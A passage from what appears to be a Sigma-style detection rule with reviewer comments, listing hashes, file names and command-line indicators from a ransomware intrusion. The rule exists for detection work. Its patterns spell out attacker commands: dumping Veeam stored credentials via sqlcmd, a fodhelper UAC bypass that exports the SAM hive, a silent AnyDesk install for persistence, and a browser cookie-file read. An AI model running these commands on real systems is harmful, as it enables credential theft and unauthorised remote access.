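      - e63eff806ef5a7d04dabad6e59e88e3a
      - 4d7102f088c73eb91213f6950f0d334157557fce
      - 452d7485ae47f431c6c4dc2ce1f021e61cd939b4a3f51b01e15d03dcd4de8ef2
  # NOTE(review): the ransom note is a written file, not a process; neither entry can match
  # it. A file-creation selection (Sysmon TargetFilename|endswith) is the useful field here.
  event8099object26058attr501573mappingFilename:
    - Image|endswith: README_FOR_DECRYPT.txt
    - ProcessName|contains: README_FOR_DECRYPT.txt
  event8099object26059:
    Hashes|contains:
      - e6bef068c93cacdae7f15eded63461da
      - 0390eacb29a580adf9870dbd3412f91d984a3197
      - bc88ae2c3353ee858a0dcdcd087bcd55f3c7eab0c702f7b295d2836565073730
  event8099object26059attr501579mappingFilename:
    - Image|endswith: MSSQLUDPScanner.exe
    - ProcessName|contains: MSSQLUDPScanner.exe
  event8099object26062:
    Hashes|contains:
      - 32d6f85c93bad9fa0f3eda1a8e800160
      - 6e7628cd11dc76835e8cc0b2a91dc38101fcdb90
      - 07f4a329f280d2896e1211ea79c73132be3a44e6c88819dea194e582bac18b3d
  event8099object26062attr501597mappingFilename:
    - Image|endswith: veeam1.cs.exe
    - ProcessName|contains: veeam1.cs.exe
  event8099object26063:
    Hashes|contains:
      - e5f3cea83f3aa86fc4766c8061a8f3ec
      - 77b238f5755940fbdc85a8f88a841e73cbe240e5
      - a05888cf9ee72435f502a4cd41e0733fb30b37192db32fb0c33675c2b7acccde
  # Command-line indicators. Each is one long literal substring, so any change in argument
  # order, spacing or quoting evades it; splitting the stable fragments into a
  # CommandLine|contains|all list would be more resilient. The values keep %ALLUSERSPROFILE%
  # unexpanded — if the source telemetry logs the expanded path the match fails; TODO confirm.
  # The multi-line wrapping of the rendered original has been folded back into single values.
  event8099object27478:
    CommandLine|contains: sqlcmd.exe -S localhost,51341 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
  event8099object27479:
    CommandLine|contains: csc.exe veeam1.cs.txt
  # NOTE(review): duplicates the fodhelper_reg_hashes.bat name check of
  # event8099object26057attr501567mappingFilename, but without the hash constraint, so the
  # weaker name-only match already fires on its own.
  event8099object27480attr545636mappingFilename:
    - Image|endswith: fodhelper_reg_hashes.bat
    - ProcessName|contains: fodhelper_reg_hashes.bat
  # ms-settings\shell\open\command hijack (fodhelper UAC bypass) carrying a SAM hive export.
  event8099object27481:
    CommandLine|contains: reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "reg.exe save hklm\sam %ALLUSERSPROFILE%\sam.save" /f
  # AnyDesk download and silent install used for persistent remote access.
  event8099object27482:
    CommandLine|contains: (new-object System.Net.WebClient).DownloadFile("http://download.anydesk.com/AnyDesk.exe", "%ALLUSERSPROFILE%\AnyDesk.exe")
  event8099object27483:
    CommandLine|contains: cmd.exe /c %ALLUSERSPROFILE%\AnyDesk.exe --install %ALLUSERSPROFILE%\AnyDesk --start-with-win --silent
  # NOTE(review): exact matches on bare file names; if the backend's ProcessName fields hold
  # a full path these need |endswith. Both keys in one map are ANDed (browser-spawned rundll32).
  event8099object27484:
    ParentProcessName: msedge.exe
    ProcessName: rundll32.exe
  event8099object27485:
    CommandLine|contains: sqlcmd -E -S localhost -Q "BACKUP DATABASE master TO DISK='%ALLUSERSPROFILE%\sql\master.bak'"
  # Cookie-file read via `more` under cmd.exe; the three keys are ANDed.
  event8099object27486:
    CommandLine|contains: edge-cookies.json
    Image|endswith: more.exe
    ParentImage|endswith: cmd.exe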